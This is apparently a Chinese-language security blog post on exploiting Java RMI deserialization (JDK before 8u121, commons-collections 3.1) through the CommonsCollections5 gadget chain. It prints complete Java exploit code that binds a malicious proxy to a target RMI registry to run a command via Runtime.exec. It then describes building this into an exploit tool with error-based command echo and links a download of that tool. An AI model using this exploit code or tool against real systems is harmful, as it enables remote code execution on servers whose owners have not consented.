RMI(java 远程方法调用)，RMI服务端和客户端之间通过序列化对象进行传输，所以JDK8 U121之前的版本存在反序列化漏洞。RMI和java反序列化原理就不详细介绍了。RMI反序列化利用成功的条件如下：

1.能够进行rmi通信。

2.JDK版本小于8.0.121

3.引入存在反序列化链的库，以commons.collections为例的话，就需要其版本小于commons.collections3.2。commons.collections3.2引入了黑名单机制，如下图所示：

其实网上有rmi反序列化工具，我们也一直在用，是大佬“小天之天”写的attackRMI。为什么我又要重新写一个呢，是因为最近看了一下工具源码，它是通过AnnotationInvocationHandler构造反序列化链的，但是我发现在commons.collections3.1中AnnotationInvocationHandler构造反序列化链不能成功复现，具体原因如果要讲清楚的话，篇幅会很长，推荐看下https://www.freebuf.com/vuls/175252.html。所以attackRMI势必会降低pwn的成功率。

我打算使用ysoserial中的Commons-Collections5(BadAttributeValueException)来构造反序列化链。推荐阅读：https://www.cnblogs.com/afanti/p/10199235.html。

BadAttributeValueException调用链如下：

BadAttributeValueException.readObject ->TiedMapEntry.toString ->LazyMap.get ->ChainedTransformer.transform

rmi反序列化代码：

String ip = "127.0.0.1";        int port = 1099;// 要执行的命令        String command = "calc";        final String ANN_INV_HANDLER_CLASS = "sun.reflect.annotation.AnnotationInvocationHandler";        Transformer[] transformers = new Transformer[] {                new ConstantTransformer(Runtime.class),                new InvokerTransformer("getMethod", new Class[] { String.class, Class[].class }, new Object[] { "getRuntime", new Class[0] }),                new InvokerTransformer("invoke", new Class[] { Object.class, Object[].class }, new Object[] { null, new Object[0] }),                new InvokerTransformer("exec", new Class[] { String.class }, new Object[] { "calc" }) };        Transformer transformerChain = new ChainedTransformer(transformers);        Map innerMap = new HashMap();        Map lazyMap = LazyMap.decorate(innerMap, transformerChain);        //lazyMap.get("haha");        TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");        //TiedMapEntry中调用了toString方法->调用了map的get方法//        BadAttributeValueExpException poc = new BadAttributeValueExpException(null); //BadAttributeValueExpException的构造方法调用toString方法//         val是私有变量，所以利用下面方法进行赋值,val变量赋值为TiedMapEntry的实例化对象,//         重写了BadAttributeValueExpException的readObject方法的val变量赋值为BadAttributeValueExpException类，//         就会调用BadAttributeValueExpException的val = valObj.toString();触发上面的//        System.setProperty("org.apache.commons.collections.enableUnsafeSerialization","true");        Field valfield = poc.getClass().getDeclaredField("val");//        System.out.println(valfield);        valfield.setAccessible(true);        valfield.set(poc, entry);//        File f = new File("poc.txt");//        ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));//        out.writeObject(poc);//        out.close();////        //从文件中反序列化obj对象//        //System.setProperty("org.apache.commons.collections.enableUnsafeSerialization","true");//        FileInputStream fis = new FileInputStream("poc.txt");//        ObjectInputStream ois = new ObjectInputStream(fis);//        //恢复对象//        ois.readObject();//        ois.close();        String name = "pwned"+ System.nanoTime();        Map<String, Object> map = new HashMap<String, Object>();        map.put(name, poc);// 获得AnnotationInvocationHandler的构造函数        Constructor cl = Class.forName(ANN_INV_HANDLER_CLASS).getDeclaredConstructors()[0];        cl.setAccessible(true);// 实例化一个代理        InvocationHandler hl = (InvocationHandler)cl.newInstance(Override.class, map);        Object object = Proxy.newProxyInstance(Remote.class.getClassLoader(), new Class[]{Remote.class}, hl);        Remote remote = Remote.class.cast(object);        Registry registry= LocateRegistry.getRegistry(ip,port);        registry.bind(name,remote);

有了这段代码就可以写工具了，既然要写成exp那肯定是需要命令回显的，除了反弹shell还有什么办法吗？因为Windows反弹shell比较麻烦，所以还是不太想使用反弹shell。咱看一下 attackRMI是怎么写的。首先在拿到命令执行权限后，上传一个ErrorBaseExec.class文件。然后再通过这个类里面的do_exec()函数来执行命令。

命令回显是通过报错来返回的，也就是说把结果写到错误信息里，让系统来捕获，最后返回给客户端。

复现：

靶机：win10，JDK1.8_0_078 ,  commons.collections3.1

服务端：

attackRMI：

我的：

但是环境的JDK和cc版本还是比较老，有时间以后还会对此工具进一步更新优化。

工具下载：

链接：https://pan.baidu.com/s/1Hp0bpPt0-UfXa4N41MysuQ

提取码：j8s7

复制这段内容后打开百度网盘手机App，操作更方便哦